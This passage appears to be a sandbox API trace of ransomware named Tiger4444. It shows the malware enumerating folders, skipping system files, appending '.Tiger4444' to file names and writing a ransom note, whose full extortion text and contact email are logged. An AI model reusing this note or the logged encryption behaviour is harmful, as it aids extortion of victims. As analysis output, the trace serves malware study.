"z:\\recovery\\windowsre\\winre.wim"), lpNewFileName="Z:\\Recovery\\WindowsRE\\Winre.wim.Tiger4444" (normalized: "z:\\recovery\\windowsre\\winre.wim.tiger4444"), dwFlags=0x1) returned 1 [0041.273] InterlockedExchangeAdd (in: Addend=0xc6f5e8, Value=9432544 | out: Addend=0xc6f5e8) returned 3171392 [0041.273] InterlockedExchangeAdd (in: Addend=0xc6f5f4, Value=2168 | out: Addend=0xc6f5f4) returned 640 [0041.273] FindNextFileW (in: hFindFile=0xc730c8, lpFindFileData=0x2fae118 | out: lpFindFileData=0x2fae118*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x1e3d62eb, ftCreationTime.dwHighDateTime=0x1d32795, ftLastAccessTime.dwLowDateTime=0x1e3d62eb, ftLastAccessTime.dwHighDateTime=0x1d32795, ftLastWriteTime.dwLowDateTime=0x419711a, ftLastWriteTime.dwHighDateTime=0x1d32795, nFileSizeHigh=0x0, nFileSizeLow=0x1d4fedd1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Winre.wim", cAlternateFileName="")) returned 0 [0041.273] FindClose (in: hFindFile=0xc730c8 | out: hFindFile=0xc730c8) returned 1 [0041.273] lstrcpyW (in: lpString1=0x2faec94, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0041.273] CreateFileW (lpFileName="Z:\\Recovery\\WindowsRE\\HOW TO BACK YOUR FILES.txt" (normalized: "z:\\recovery\\windowsre\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a4 [0041.273] CreateFileMappingW (hFile=0x2a4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a8 [0041.273] MapViewOfFile (hFileMappingObject=0x2a8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xc20000 [0041.274] UnmapViewOfFile (lpBaseAddress=0xc20000) returned 1 [0041.274] CloseHandle (hObject=0x2a8) returned 1 [0041.274] CloseHandle (hObject=0x2a4) returned 1 [0041.274] GetCurrentThreadId () returned 0xf7c [0041.274] RtlInterlockedPopEntrySList (in: ListHead=0xc66448 | out: ListHead=0xc66448) returned 0x0 [0041.274] GetCurrentThreadId () returned 0xf7c [0041.274] WaitForMultipleObjects (nCount=0x0, lpHandles=0x2fae368*=0x0, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0xffffffff [0041.274] RtlInterlockedPopEntrySList (in: ListHead=0xc66448 | out: ListHead=0xc66448) returned 0x0 [0041.274] RtlInterlockedFlushSList (in: ListHead=0xc66448 | out: ListHead=0xc66448) returned 0x0 [0041.274] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66440 | out: hHeap=0xc50000) returned 1 [0041.274] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc6f5d8 | out: hHeap=0xc50000) returned 1 [0041.274] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc85e78 | out: hHeap=0xc50000) returned 1 [0041.274] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89de8 | out: hHeap=0xc50000) returned 1 [0041.274] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752d8 | out: hHeap=0xc50000) returned 1 [0041.275] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 Thread: id = 15 os_tid = 0xee8 [0041.375] RtlInterlockedPopEntrySList (in: ListHead=0xc665a8 | out: ListHead=0xc665a8) returned 0xc663a8 [0041.375] lstrcpynW (in: lpString1=0x2faee88, lpString2="C:\\Windows10Upgrade\\2052", iMaxLength=2048 | out: lpString1="C:\\Windows10Upgrade\\2052") returned="C:\\Windows10Upgrade\\2052" [0041.375] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72f08 | out: hHeap=0xc50000) returned 1 [0041.375] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc663a0 | out: hHeap=0xc50000) returned 1 [0041.375] lstrcatW (in: lpString1="", lpString2="C:\\Windows10Upgrade\\2052" | out: lpString1="C:\\Windows10Upgrade\\2052") returned="C:\\Windows10Upgrade\\2052" [0041.375] lstrcatW (in: lpString1="C:\\Windows10Upgrade\\2052", lpString2="\\" | out: lpString1="C:\\Windows10Upgrade\\2052\\") returned="C:\\Windows10Upgrade\\2052\\" [0041.375] lstrcatW (in: lpString1="C:\\Windows10Upgrade\\2052\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Windows10Upgrade\\2052\\.BFC0E91B00AE8A0620D3") returned="C:\\Windows10Upgrade\\2052\\.BFC0E91B00AE8A0620D3" [0041.375] CreateFileW (lpFileName="C:\\Windows10Upgrade\\2052\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\windows10upgrade\\2052\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0xffffffff [0041.376] lstrcatW (in: lpString1="", lpString2="C:\\Windows10Upgrade\\2052" | out: lpString1="C:\\Windows10Upgrade\\2052") returned="C:\\Windows10Upgrade\\2052" [0041.376] lstrcatW (in: lpString1="C:\\Windows10Upgrade\\2052", lpString2="\\" | out: lpString1="C:\\Windows10Upgrade\\2052\\") returned="C:\\Windows10Upgrade\\2052\\" [0041.376] lstrcatW (in: lpString1="C:\\Windows10Upgrade\\2052\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Windows10Upgrade\\2052\\.BFC0E91B00AE8A0620D3") returned="C:\\Windows10Upgrade\\2052\\.BFC0E91B00AE8A0620D3" [0041.376] CreateFileW (lpFileName="C:\\Windows10Upgrade\\2052\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\windows10upgrade\\2052\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a4 [0041.376] ReadFile (in: hFile=0x2a4, lpBuffer=0x2faca70, nNumberOfBytesToRead=0x3d4, lpNumberOfBytesRead=0x2faca6c, lpOverlapped=0x0 | out: lpBuffer=0x2faca70*, lpNumberOfBytesRead=0x2faca6c*=0x3d4, lpOverlapped=0x0) returned 1 [0041.376] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x4) returned 0xc752d8 [0041.376] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0041.376] lstrlenA (lpString="a0 4V dp nm e7 7W Ey gE dV 9i ic Zb au WZ my rm\r\nCd 19 3r AN k0 3D 2P LS Rx 6n rJ N8 TT 9v Wj GN\r\ndO l/ Tl Ds Bk QE 3q hn 58 yr Xg sN A1 eq 93 ki\r\noN vX pz 04 c1 eh Vl RF ot Xw 04 Lj /f qC rB 5P\r\nnu Wm aZ vl 5i nK 51 ON 1I Xz hM Hm p0 Vo zQ UR\r\n2d FC 2d Jo Dy fp KS ub Tp +w NK or 9V Fg xI 7f\r\nEf qM N8 3J 1T 8+ DD Gc EX cO 9t Dp KG PK Ib gd\r\nvU 5C qf 5k iv EE 6q 8t vk 2r WR K/ rT 4d xS KW\r\nBP zZ m3 Bt LD 1z In Mg 4l 3T br 9b Ht OJ 5Y Wf\r\nT+ D6 q7 +d pZ o6 aJ TO Ny cF qx aM lT GX 6s KR\r\nG8 yN uk BR 82 5E SK b2 B9 Qv Jn jq 2O hl I6 bj\r\nAO rC AM zM 00 HV 6D Ar 7m dc HI zQ rT hm qM KD\r\nQu NB gt hX 4g 8S 47 tc 0Y KP v0 sf +G Wm sm CV\r\nH4 5f cM qi /+ gt XB 0X 77 n0 vI Nv Lg fK AA dx\r\nRJ 3I uf RX yF O3 kU El hD 1v f6 jj Bh b9 kq aJ\r\nKe Wo qh K1 zI Rp sz 7i uV 57 Px Ce G2 P2 Ir GA\r\nOw mo GT AB OZ h1 nV mv tj Aw vo Cf Vp kx Kl EW\r\n+i N0 oo d2 33 LH BP Xn Ht lv mA iP kN fG kV kK\r\nen rK fv ln N0 Yd Bd di 51 sb d6 oX sC hv 71 Xw\r\nFk RE X1 vl yY YR L5 zm 1Y KY lN Q6 Qk K5 Ps Ss\r\n02 8y Pq 8Y Ve 4r eQ vY sZ H8 +M 9V U9 Qm Ih 4X\r\nyQ 4n 9T NS sl s= ") returned 1047 [0041.376] lstrlenA (lpString="{{ID}}") returned 6 [0041.377] lstrlenA (lpString=" YOUR FILES ARE ENCRYPTED !!!\r\n\r\nTO DECRYPT, FOLLOW THE INSTRUCTIONS:\r\n\r\nTo recover data you need decrypt tool.\r\n\r\nTo get the decrypt tool you should:\r\n\r\n1.In the letter include your personal ID! Send me this ID in your first email to me!\r\n2.We can give you free test for decrypt few files (NOT VALUE) and assign the price for decryption all files!\r\n3.After we send you instruction how to pay for decrypt tool and after payment you will receive a decryption tool! \r\n4.We can decrypt few files in quality the evidence that we have the decoder.\r\n\r\n\r\n DO NOT TRY TO DO SOMETHING WITH YOUR FILES BY YOURSELF YOU WILL BRAKE YOUR DATA !!! ONLY WE ARE CAN HELP YOU! CONTACT US:\r\n\r\nChina.helper@aol.com \r\n\r\n\r\n ATTENTION !!! THIS IS YOUR PERSONAL ID WICH YOU HAVE TO SEND IN FIRST LETTER:\r\n\r\n{{ID}}\r\n") returned 827 [0041.377] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x74c) returned 0xc857a8 [0041.377] CloseHandle (hObject=0x2a4) returned 1 [0041.377] GetLastError () returned 0x0 [0041.377] lstrlenW (lpString="C:\\Windows10Upgrade\\2052") returned 24 [0041.377] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0041.377] FindFirstFileW (in: lpFileName="C:\\Windows10Upgrade\\2052\\*", lpFindFileData=0x2fae338 | out: lpFindFileData=0x2fae338*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea35483d, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x7bd7c39a, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x7bd7c39a, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc73088 [0041.377] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0041.377] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0041.377] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0041.377] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0041.377] FindNextFileW (in: hFindFile=0xc73088, lpFindFileData=0x2fae338 | out: lpFindFileData=0x2fae338*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea35483d, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x7bd7c39a, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x7bd7c39a, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.377] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0041.377] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0041.377] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0041.377] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0041.377] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0041.377] FindNextFileW (in: hFindFile=0xc73088, lpFindFileData=0x2fae338 | out: lpFindFileData=0x2fae338*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x7bd7c39a, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x7bd7c39a, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x7bd7c39a, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0x0, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0041.377] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0041.377] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0041.377] FindNextFileW (in: hFindFile=0xc73088, lpFindFileData=0x2fae338 | out: lpFindFileData=0x2fae338*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea355be9, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea355be9, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xfa216a00, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x1cec8, dwReserved0=0x0, dwReserved1=0x0, cFileName="DWINTL20.DLL", cAlternateFileName="")) returned 1 [0041.377] lstrcmpiW (lpString1="DWINTL20.DLL", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0041.377] lstrcmpiW (lpString1="DWINTL20.DLL", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0041.377] lstrcmpiW (lpString1="DWINTL20.DLL", lpString2="Tiger4444.exe") returned -1 [0041.377] lstrcmpiW (lpString1="DWINTL20.DLL", lpString2=".") returned 1 [0041.377] lstrcmpiW (lpString1="DWINTL20.DLL", lpString2="..") returned 1 [0041.377] lstrcmpiW (lpString1="DWINTL20.DLL", lpString2="windows") returned -1 [0041.378] lstrcmpiW (lpString1="DWINTL20.DLL", lpString2="bootmgr") returned 1 [0041.378] lstrcmpiW (lpString1="DWINTL20.DLL", lpString2="pagefile.sys") returned -1 [0041.378] lstrcmpiW (lpString1="DWINTL20.DLL", lpString2="boot") returned 1 [0041.378] lstrcmpiW (lpString1="DWINTL20.DLL", lpString2="ids.txt") returned -1 [0041.378] lstrcmpiW (lpString1="DWINTL20.DLL", lpString2="NTUSER.DAT") returned -1 [0041.378] lstrcpyW (in: lpString1=0x2faeeba, lpString2="DWINTL20.DLL" | out: lpString1="DWINTL20.DLL") returned="DWINTL20.DLL" [0041.378] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\2052\\DWINTL20.DLL", dwFileAttributes=0x0) returned 1 [0041.378] lstrlenW (lpString="DWINTL20.DLL") returned 12 [0041.378] lstrlenW (lpString="Tiger4444") returned 9 [0041.378] lstrcmpiW (lpString1="NTL20.DLL", lpString2="Tiger4444") returned -1 [0041.378] lstrlenW (lpString=".dll") returned 4 [0041.378] lstrcmpiW (lpString1=".DLL", lpString2=".dll") returned 0 [0041.378] FindNextFileW (in: hFindFile=0xc73088, lpFindFileData=0x2fae338 | out: lpFindFileData=0x2fae338*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea355be9, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea355be9, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xfa216a00, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x1cec8, dwReserved0=0x0, dwReserved1=0x0, cFileName="DWINTL20.DLL", cAlternateFileName="")) returned 0 [0041.378] FindClose (in: hFindFile=0xc73088 | out: hFindFile=0xc73088) returned 1 [0041.378] lstrcpyW (in: lpString1=0x2faeeba, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0041.378] CreateFileW (lpFileName="C:\\Windows10Upgrade\\2052\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\windows10upgrade\\2052\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a4 [0041.381] CreateFileMappingW (hFile=0x2a4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a8 [0041.382] MapViewOfFile (hFileMappingObject=0x2a8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xc20000 [0041.382] UnmapViewOfFile (lpBaseAddress=0xc20000) returned 1 [0041.382] CloseHandle (hObject=0x2a8) returned 1 [0041.382] CloseHandle (hObject=0x2a4) returned 1 [0041.383] GetCurrentThreadId () returned 0xee8 [0041.383] RtlInterlockedPopEntrySList (in: ListHead=0xc665a8 | out: ListHead=0xc665a8) returned 0x0 [0041.383] GetCurrentThreadId () returned 0xee8 [0041.383] WaitForMultipleObjects (nCount=0x0, lpHandles=0x2fae588*=0x0, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0xffffffff [0041.383] RtlInterlockedPopEntrySList (in: ListHead=0xc665a8 | out: ListHead=0xc665a8) returned 0x0 [0041.383] RtlInterlockedFlushSList (in: ListHead=0xc665a8 | out: ListHead=0xc665a8) returned 0x0 [0041.383] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc665a0 | out: hHeap=0xc50000) returned 1 [0041.383] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc6f718 | out: hHeap=0xc50000) returned 1 [0041.383] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc857a8 | out: hHeap=0xc50000) returned 1 [0041.383] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752d8 | out: hHeap=0xc50000) returned 1 [0041.383] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 Thread: id = 16 os_tid = 0x9e0 [0051.659] RtlInterlockedPopEntrySList (in: ListHead=0xc5a728 | out: ListHead=0xc5a728) returned 0xc666c8 [0051.659] lstrcpynW (in: lpString1=0x2fae8a0, lpString2="C:\\Windows10Upgrade\\resources\\i386", iMaxLength=2048 | out: lpString1="C:\\Windows10Upgrade\\resources\\i386") returned="C:\\Windows10Upgrade\\resources\\i386" [0051.659] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7b558 | out: hHeap=0xc50000) returned 1 [0051.659] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc666c0 | out: hHeap=0xc50000) returned 1 [0051.659] lstrcatW (in: lpString1="", lpString2="C:\\Windows10Upgrade\\resources\\i386" | out: lpString1="C:\\Windows10Upgrade\\resources\\i386") returned="C:\\Windows10Upgrade\\resources\\i386" [0051.659] lstrcatW (in: lpString1="C:\\Windows10Upgrade\\resources\\i386", lpString2="\\" | out: lpString1="C:\\Windows10Upgrade\\resources\\i386\\") returned="C:\\Windows10Upgrade\\resources\\i386\\" [0051.660] lstrcatW (in: lpString1="C:\\Windows10Upgrade\\resources\\i386\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Windows10Upgrade\\resources\\i386\\.BFC0E91B00AE8A0620D3") returned="C:\\Windows10Upgrade\\resources\\i386\\.BFC0E91B00AE8A0620D3" [0051.661] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\i386\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\windows10upgrade\\resources\\i386\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0xffffffff [0051.684] lstrcatW (in: lpString1="", lpString2="C:\\Windows10Upgrade\\resources\\i386" | out: lpString1="C:\\Windows10Upgrade\\resources\\i386") returned="C:\\Windows10Upgrade\\resources\\i386" [0051.684] lstrcatW (in: lpString1="C:\\Windows10Upgrade\\resources\\i386", lpString2="\\" | out: lpString1="C:\\Windows10Upgrade\\resources\\i386\\") returned="C:\\Windows10Upgrade\\resources\\i386\\" [0051.684] lstrcatW (in: lpString1="C:\\Windows10Upgrade\\resources\\i386\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Windows10Upgrade\\resources\\i386\\.BFC0E91B00AE8A0620D3") returned="C:\\Windows10Upgrade\\resources\\i386\\.BFC0E91B00AE8A0620D3" [0051.685] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\i386\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\windows10upgrade\\resources\\i386\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0051.693] ReadFile (in: hFile=0x260, lpBuffer=0x2fac488, nNumberOfBytesToRead=0x3d4, lpNumberOfBytesRead=0x2fac484, lpOverlapped=0x0 | out: lpBuffer=0x2fac488*, lpNumberOfBytesRead=0x2fac484*=0x3d4, lpOverlapped=0x0) returned 1 [0051.693] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x4) returned 0xc752e8 [0051.699] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0051.699] lstrlenA (lpString="a0 4V dp nm e7 7W Ey gE dV 9i ic Zb au WZ my rm\r\nCd 19 3r AN k0 3D 2P LS Rx 6n rJ N8 TT 9v Wj GN\r\ndO l/ Tl Ds Bk QE 3q hn 58 yr Xg sN A1 eq 93 ki\r\noN vX pz 04 c1 eh Vl RF ot Xw 04 Lj /f qC rB 5P\r\nnu Wm aZ vl 5i nK 51 ON 1I Xz hM Hm p0 Vo zQ UR\r\n2d FC 2d Jo Dy fp KS ub Tp +w NK or 9V Fg xI 7f\r\nEf qM N8 3J 1T 8+ DD Gc EX cO 9t Dp KG PK Ib gd\r\nvU 5C qf 5k iv EE 6q 8t vk 2r WR K/ rT 4d xS KW\r\nBP zZ m3 Bt LD 1z In Mg 4l 3T br 9b Ht OJ 5Y Wf\r\nT+ D6 q7 +d pZ o6 aJ TO Ny cF qx aM lT GX 6s KR\r\nG8 yN uk BR 82 5E SK b2 B9 Qv Jn jq 2O hl I6 bj\r\nAO rC AM zM 00 HV 6D Ar 7m dc HI zQ rT hm qM KD\r\nQu NB gt hX 4g 8S 47 tc 0Y KP v0 sf +G Wm sm CV\r\nH4 5f cM qi /+ gt XB 0X 77 n0 vI Nv Lg fK AA dx\r\nRJ 3I uf RX yF O3 kU El hD 1v f6 jj Bh b9 kq aJ\r\nKe Wo qh K1 zI Rp sz 7i uV 57 Px Ce G2 P2 Ir GA\r\nOw mo GT AB OZ h1 nV mv tj Aw vo Cf Vp kx Kl EW\r\n+i N0 oo d2 33 LH BP Xn Ht lv mA iP kN fG kV kK\r\nen rK fv ln N0 Yd Bd di 51 sb d6 oX sC hv 71 Xw\r\nFk RE X1 vl yY YR L5 zm 1Y KY lN Q6 Qk K5 Ps Ss\r\n02 8y Pq 8Y Ve 4r eQ vY sZ H8 +M 9V U9 Qm Ih 4X\r\nyQ 4n 9T NS sl s= ") returned 1047 [0051.699] lstrlenA (lpString="{{ID}}") returned 6 [0051.715] lstrlenA (lpString=" YOUR FILES ARE ENCRYPTED !!!\r\n\r\nTO DECRYPT, FOLLOW THE INSTRUCTIONS:\r\n\r\nTo recover data you need decrypt tool.\r\n\r\nTo get the decrypt tool you should:\r\n\r\n1.In the letter include your personal ID! Send me this ID in your first email to me!\r\n2.We can give you free test for decrypt few files (NOT VALUE) and assign the price for decryption all files!\r\n3.After we send you instruction how to pay for decrypt tool and after payment you will receive a decryption tool! \r\n4.We can decrypt few files in quality the evidence that we have the decoder.\r\n\r\n\r\n DO NOT TRY TO DO SOMETHING WITH YOUR FILES BY YOURSELF YOU WILL BRAKE YOUR DATA !!! ONLY WE ARE CAN HELP YOU! CONTACT US:\r\n\r\nChina.helper@aol.com \r\n\r\n\r\n ATTENTION !!! THIS IS YOUR PERSONAL ID WICH YOU HAVE TO SEND IN FIRST LETTER:\r\n\r\n{{ID}}\r\n") returned 827 [0051.715] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x74c) returned 0xc8c9a0 [0051.715] CloseHandle (hObject=0x260) returned 1 [0051.715] GetLastError () returned 0x0 [0051.715] lstrlenW (lpString="C:\\Windows10Upgrade\\resources\\i386") returned 34 [0051.715] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0051.715] FindFirstFileW (in: lpFileName="C:\\Windows10Upgrade\\resources\\i386\\*", lpFindFileData=0x2fadd50 | out: lpFindFileData=0x2fadd50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea3a9fd3, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x7db9081f, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x7db9081f, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72f08 [0051.715] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.715] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.715] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0051.715] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0051.715] FindNextFileW (in: hFindFile=0xc72f08, lpFindFileData=0x2fadd50 | out: lpFindFileData=0x2fadd50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea3a9fd3, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x7db9081f, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x7db9081f, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0051.716] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.716] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.716] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0051.716] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0051.716] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0051.716] FindNextFileW (in: hFindFile=0xc72f08, lpFindFileData=0x2fadd50 | out: lpFindFileData=0x2fadd50*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x7db9081f, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x7db9081f, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x7db9081f, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0x0, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0051.716] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.716] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0051.716] FindNextFileW (in: hFindFile=0xc72f08, lpFindFileData=0x2fadd50 | out: lpFindFileData=0x2fadd50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3ab347, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3ab347, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x626300, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x16600, dwReserved0=0x0, dwReserved1=0x0, cFileName="BiosBlocks.xml", cAlternateFileName="BIOSBL~1.XML")) returned 1 [0051.716] lstrcmpiW (lpString1="BiosBlocks.xml", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.716] lstrcmpiW (lpString1="BiosBlocks.xml", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.716] lstrcmpiW (lpString1="BiosBlocks.xml", lpString2="Tiger4444.exe") returned -1 [0051.716] lstrcmpiW (lpString1="BiosBlocks.xml", lpString2=".") returned 1 [0051.716] lstrcmpiW (lpString1="BiosBlocks.xml", lpString2="..") returned 1 [0051.716] lstrcmpiW (lpString1="BiosBlocks.xml", lpString2="windows") returned -1 [0051.716] lstrcmpiW (lpString1="BiosBlocks.xml", lpString2="bootmgr") returned -1 [0051.716] lstrcmpiW (lpString1="BiosBlocks.xml", lpString2="pagefile.sys") returned 